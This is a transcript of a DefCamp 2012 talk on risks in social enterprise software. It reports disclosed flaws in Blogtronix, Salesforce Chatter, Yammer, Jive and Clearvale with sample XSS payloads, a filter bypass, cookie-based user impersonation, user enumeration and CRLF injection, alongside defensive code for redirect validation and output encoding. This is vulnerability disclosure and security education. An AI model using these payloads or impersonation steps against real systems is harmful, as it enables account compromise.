
Social Enterprise Rises! …and so are the Risks - DefCamp 2012

Transcript of "Social Enterprise Rises! …and so are the Risks - DefCamp 2012"

1. Social Enterprise Software Rises! …and so are the Risks
   Marian Ventuneac
   marian.ventuneac@gmail.com
   @mventuneac
2. About myself
   - Security Architect
   - International presenter
   - Member of OWASP and ISACA global organizations
   - OWASP Ireland Limerick Chapter Leader, https://www.owasp.org/index.php/Ireland-Limerick
   - Security Researcher, PhD, MEng
   - http://www.ventuneac.net
   - http://secureappdev.blogspot.com
   - http://dcsl.ul.ie
   An Introduction to Web Application Security Risks
3. Agenda
   - Social Enterprise Software: What, Why, and How?
   - Social Enterprise Software & Risks
   - Thoughts on Calculated Risk
   - Social Enterprise Software & Risks (some case studies)
   - Final Thoughts
4. Social Enterprise Software: What?
   - Social Enterprise / Social Enterprise Networks / Social Enterprise Software
   - Enterprise solutions providing Facebook-like social networking functionality
   - 'social networking' + 'enterprise software' = 'social enterprise networking'
5. Social Enterprise Software: Why?
   - Improve communication and increase work efficiency
     - internal collaboration
     - establish teams, communities or informal groups
     - share knowledge and learn from other people's experiences
     - social networking
     - external collaboration with partners
     - …
   - Used by employees and external customers, suppliers, partners
6. Social Enterprise Software: Deployment models
   - On-premise solutions
     - Deployed inside the enterprise network, usually controlled and managed by the client
   - Public Cloud-based solutions
     - Software as a Service (SaaS): hosted and administered by the vendor
   - Hybrid deployments
   - Usually open to allow external collaboration
     - customers, suppliers, third-party contractors, etc.
7. Social Enterprise Software: Some of the Risks
   - Potential loss of enterprise data
     - Understand what type of data needs to be uploaded there
     - Do you know/control what data is actually being shared?
   - Exploitation of common application vulnerabilities
   - Phishing attacks, social engineering
   - Viruses and malware
   - Cloud-based solutions: various compliance and security concerns
     - Do you know where your data is stored?
8. Common Strategies for Risk Mitigation
   - Vendor/supplier due diligence
   - Security policies (generic/dedicated)
   - Security processes & procedures
     - Control the data being shared (data classification)
     - Verify identity of users accessing the data (authentication)
     - Control user access to data
     - Approve/Create/Lock user accounts (accounts management)
     - Remote wipe (for mobile devices: smartphones, tablets, etc.)
     - …
9. Calculated Risks
10. Calculated Risks (cont)
    Business requirement:
    - WE (the company) need social enterprise software X for Y and Z reasons.
    IT Security (most likely take on it):
    - Scenario 1: No, there is too much risk to take!
    - Scenario 2: Yes, we trust our partners and their choices.
    - Scenario 3: Yes, IF Business ASSUMES ALL THE RISKS…
    - Scenario 4: Let's take a closer look at it…
    - Scenario 5: Yes, the vendor is big enough and we can trust it (= the vendor takes application security seriously)
11. Let's Take a Closer Look
    - Software defects leading to exploitation of security vulnerabilities
      - OWASP Top 10 Security Risks
      - CWE/SANS Top 25 Programming Errors
    - Vendor size: a plus, but doesn't guarantee the chosen solution is vulnerability free
    - It is safe to assume there is no application that is 100% secure
    - If anyone claims such a thing, can they provide reasonable proof?
12. Let's Take a Closer Look (cont)
    Trust but verify
    - Reach an agreement to test the chosen solution in a suitable environment (ideally prior to any contracts being signed)
      - Manual security testing
      - Automated security testing
      - Responsible disclosure
    - Most likely you will not be disappointed
13. The Closer Look (cont)
    A practical take on assessing security of social enterprise software solutions
    Some of the chosen ones
14. The Closer Look (cont)
    Assessment criteria including tests for
    - Cross-Site Scripting (XSS)
    - Insecure Direct Object Reference
    - Security Misconfiguration
    - Failure to Restrict URL Access
    - Unvalidated Redirects and Forwards
    - Logical Flaws
    - …
15. Blogtronix Enterprise
    Blogtronix Enterprise v4.0.4179 (on-premise) and SaaS
    CVE-2011-1039 - Multiple XSS Vulnerabilities
    - Persistent (partially) XSS via Search functionality (auth. user)
      HTTP request:
        http://test_site/Home/pages/search/?search=<script>alert(document.cookie)</script>&sub=1&tab=0
      HTTP response:
        …
        <a href="/Home/pages/search/?search=%3cscript%3ealert(document.cookie)%3b&amp;sub=1&amp;tab=0"><script>alert(docume...</a> </span> <span style=" …
16. Blogtronix Enterprise (cont)
    CVE-2011-1039 - Multiple XSS Vulnerabilities
    - Reflected XSS in login page via arbitrary parameter
      HTTP request:
        https://test_site/pages/login/?a"><script>alert(document.cookie)</script>
      HTTP response:
        <form method="post" action="/pages/login/?a"><script>alert(document.cookie)</script>" id="aspnetForm">
    - Multiple Reflected XSS via existing and arbitrary parameters of existing resources
17. Blogtronix Enterprise (cont)
    Insecure Direct Object Reference (variant)
    - Valid user A can potentially impersonate another user B
    - Tamper with the value of the userAccountID_http://test_site/ cookie (ASP.NET GUID)
      1. At login time, replace the value of the userAccountID_ cookie with the one matching user B
      2. Do something noticeable (post a message in group X) & log out
      3. As authenticated user A, review user B's recent activity: user B appears as a recent visitor of group X
18. Blogtronix Enterprise (cont)
    Security Misconfiguration
    - Enumerate valid user IDs
      - Unauthenticated attacker checks for https://test_site/users/user_id
      - if user_id exists, redirected to login
      - if not, a custom error is displayed
    - Enumerate valid groups
      - Unauthenticated attacker checks for https://test_site/group_id/pages/people/
      - if group_id exists, redirected to login
      - if not, a custom error is displayed
19. Blogtronix Enterprise (cont)
    Improper Error Handling
20. Blogtronix Enterprise (cont)
    CVE-2011-1040 Unvalidated Redirects
      https://test_site/pages/login/?ReturnUrl=http%3a%2f%2fwww.google.co.uk%2f
    - Once the user logs in, he/she gets redirected to the resource previously stated via the ReturnUrl parameter
    CVE-2011-1041 Failure to restrict access to protected resources
    - Attacker knows hashed user ID and name of uploaded file => file can be accessed without auth.
    - Attacker knows hashed user ID => user profile picture can be accessed without auth.
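The server-side check that the CVE-2011-1040 finding calls for, as an added example (Python, not Blogtronix code): a ReturnUrl value is only honoured when it is a relative path on the same site, otherwise the user lands on a fixed default page. The default landing path /Home/ is an assumption.

```python
from urllib.parse import unquote, urlsplit

# Added example, not the vendor's code: validate a post-login ReturnUrl so
# that it can only point back into this site (never to an external host).


def is_safe_return_url(return_url):
    """True only for a relative, same-site path such as /Home/pages/search/."""
    if not return_url:
        return False
    # Decode once, as the web framework would (turns %3a%2f%2f into ://).
    url = unquote(return_url)
    # Control characters are never legitimate here.
    if any(ord(c) < 0x20 for c in url):
        return False
    parts = urlsplit(url)
    # A scheme (http:, javascript:, ...) or a host part means an absolute
    # URL, including protocol-relative //host forms: reject it.
    if parts.scheme or parts.netloc:
        return False
    # Must be an absolute path on this site. Browsers treat a backslash after
    # the leading slash like a second slash, so /\host is rejected as well.
    if not url.startswith("/") or url.startswith(("//", "/\\")):
        return False
    return True


def post_login_redirect(return_url, default="/Home/"):
    """Destination to send the user to after authentication (default path is
    an assumption for this example)."""
    return unquote(return_url) if is_safe_return_url(return_url) else default
```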
21. Salesforce Chatter SaaS
    Multiple persistent XSS vulnerabilities
    - via user profile first & last name
        <a href="/005D00000022Ouw" class="entityLink" title="Adam" onmouseover="alert(1)" Cole">Adam&quot; onmouseover=&quot;alert(1)&quot; Cole</a>
    - via group name
        <a href="/0F9D0000000PPwz" class="entityLink" title="test_group" onmouseover="alert(3)"">test_group&quot; onmouseover=&quot;alert(3)&quot;</a>
22. Salesforce Chatter SaaS (cont)
    Improper User Input Validation
    - File Sharing: CR LF symbols accepted into file title (via SaaS solution)
        POST /mobile/direct/23.0/005D0000001yD7B/feed_items.json HTTP/1.1
        Host: eu1.salesforce.com
        …
        Content-Disposition: form-data; name="title"

        arv_test52%0a%0d%0a
23. Salesforce Chatter Desktop
    Improper Error Handling leading to Information Disclosure
    - submitting comments for non-existent posts
      HTTP POST request:
        /mobile/direct/23.0/0D5D00000000000/comments.json HTTP/1.1
      Error:
        {"status":404,"msg":"NoDataFoundException: ORA-20001: \nORA-06512: at "DOPEY.CFEEDCOMMENT", line 149\nORA-06512: at "DOPEY.CFEEDCOMMENT", line 253\nORA-06512: at line 1\n: {call cFeedComment.insert_feedcomments(?,?,?,?,?,?,?,?,?,?,?,?,?)})}"}
    - attempting to 'like' a non-existent post
      HTTP POST request:
        /mobile/direct/23.0/0D5D00000000000/like.json HTTP/1.1
      Error:
        {"status":404,"msg":"NoDataFoundException: ORA-20001: \nORA-06512: at "DOPEY.CFEEDLIKE", line 156\nORA-06512: at "DOPEY.CFEEDLIKE", line 217\nORA-06512: at "DOPEY.CFEEDLIKE", line 118\nORA-06512: at line 1\n: {call cFeedLike.insert_detail(?,?,?,?,?,?,?,?)})}"}
24. Yammer
    Persistent XSS via group name
    HTTP POST request:
      POST /ventuneac.net/groups HTTP/1.1
      Host: www.yammer.com
      …
      -----------------------------295562556131627
      Content-Disposition: form-data; name="group[name]"

      a4" onmouseover="alert(4)"
      -----------------------------295562556131627
    HTTP response (home page):
      GET /ventuneac.net/ HTTP/1.1
      Host: www.yammer.com
      …
      <a href="/ventuneac.net/groups/a4onmouseoveralert4" class="nav-list-link" title="a4" onmouseover="alert(4)" group">
25. Jive
    Persistent XSS via group name (create/edit)
    HTTP POST request:
      POST /create-group.jspa HTTP/1.1
      Host: ventuneac.jiveon.com
      …
      -----------------------------215202979014924
      Content-Disposition: form-data; name="description"

      group2"><script>alert(1)</script>
      -----------------------------215202979014924
    HTTP response (load group from Places):
      GET /groups/group2 HTTP/1.1
      Host: ventuneac.jiveon.com
      …
      <meta name="description" content="group2"><script>alert(1)</script>" />
26. BroadVision Clearvale SaaS
    Multiple persistent XSS vulnerabilities
    - via user profile first & last name & search page
        <a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style="xss:expr/*XSS*/ession(document.location(http://www.google.co.uk))">m&quot; style=&quot;xss:expr/*XS...</a>
    - via group name & search page
        <a href="http://vmarian.clearvale.com/pg/groups/23/aaaa-stylexssexprxssessiondocumentlocationhttpwwwgooglecouk/" title="aaa"><a style="xss:expr/*XSS*/ession(document.location(http://www.google.co.uk))">aaa&quot;&gt;&lt;a style=&quot;xss:exp...</a>
27. BroadVision Clearvale SaaS (cont)
    The broken fix for the user profile name XSS issue
    - Black-list user input validation
      - style followed by = becomes style00 (style=, style =, etc.)
      - document.location followed by ( becomes document.location00
      - alert followed by ( becomes 00
      - /* becomes /0* for the first instance only
      - */ becomes *0/
      - …
    - Improper output escaping
28. BroadVision Clearvale SaaS (cont)
    The broken fix for the user profile name XSS issue
    - Bypassing the Clearvale XSS filter
      XSS payload:
        firstname: m" style
        lastname: ="/**/;xss:expr/**/ession(alert/**/(aaa))
      HTTP response:
        …
        <a href="http://vmarian.clearvale.com/pg/profile/3" rel="me" . title="m" style ="/0**0/;xss:expr/**/ession(alert/**/(aaa)) ">m&quot; style =&quot;/0**0/;xss:...</a>
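The fix the Chatter, Yammer, Jive and Clearvale findings (slides 21 and 24 to 28) have in common is context-aware output encoding rather than input black-listing. The added example below (Python, not any vendor's code) renders the same profile link with raw concatenation and with attribute encoding, then parses the result to check which attributes the browser would actually see; the display name is the one from slide 21.

```python
import html
from html.parser import HTMLParser

# Constructed sample input: the display name from slide 21, which carries a
# quote so it can close the title attribute and add an event handler.
PAYLOAD_NAME = 'Adam" onmouseover="alert(1)" Cole'


class _TagCollector(HTMLParser):
    """Collect (tag, attributes) for every start tag in a fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def render_link_unsafe(user_id, display_name):
    """The pattern behind the findings: user data concatenated into HTML.
    user_id is assumed to be a validated record id, not user text."""
    return (f'<a href="/{user_id}" class="entityLink" '
            f'title="{display_name}">{display_name}</a>')


def render_link(user_id, display_name):
    """Hardened version: encode at output time for the attribute and text
    contexts. html.escape(quote=True) turns " ' < > & into entities, so the
    value can neither close the attribute nor open a tag."""
    safe = html.escape(display_name, quote=True)
    return (f'<a href="/{user_id}" class="entityLink" '
            f'title="{safe}">{safe}</a>')


def only_expected_attrs(markup, expected):
    """Check: exactly one <a> tag whose attribute names are exactly the ones
    the template intended (no onmouseover, style, or stray names)."""
    tags = parse_tags(markup)
    return (len(tags) == 1 and tags[0][0] == "a"
            and set(tags[0][1]) == set(expected))
```

The parsed title of the hardened output equals the original display name, which is why encoding at output, unlike the Clearvale black-list, needs no list of dangerous tokens and cannot be bypassed by splitting a payload across the first and last name fields.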
29. Knowing What 'private' Really Means
    Social Enterprise Software usually provides document sharing/publishing functionality
    - Private (not shared with anyone; default option)
    - Shared with private (locked) groups/members
    - Shared with public groups
    - Shared with everyone (shared via public link)
    In certain conditions, the private documents can become… less private
30. AntiVirus & anti-malware file scanning
    - BroadVision Clearvale has a built-in AV scanning engine
    - The rest of the tested solutions currently lack such capabilities
    - Yammer and Salesforce plan to add AV file scanning
    - No malicious files were used for testing AV capabilities
31. The Closer Look: Summary
    - Common security vulnerabilities: can be easily exploited
    - User shared information is not properly validated and sanitised
      - A malicious user can inject JavaScript malware into his/her profile/groups/actions/etc.
      - Where such user controlled data is seen/accessed by other users, their accounts can easily get compromised
    - Exploitation of such vulnerabilities could severely compromise the security of enterprise data
32. Final Thoughts
    - Even if the vendor is a market leader, it doesn't necessarily mean they get application security right
    - Dare to ask for proof of application security
    - Trust but verify
    - Vendor due diligence, social enterprise software related security policies & security procedures, etc.
    - Interested in this kind of benchmark? OWASP Security Baseline Project
      https://www.owasp.org/index.php/OWASP_Security_Baseline_Project
33. Thank You
    marian.ventuneac@gmail.com
    @mventuneac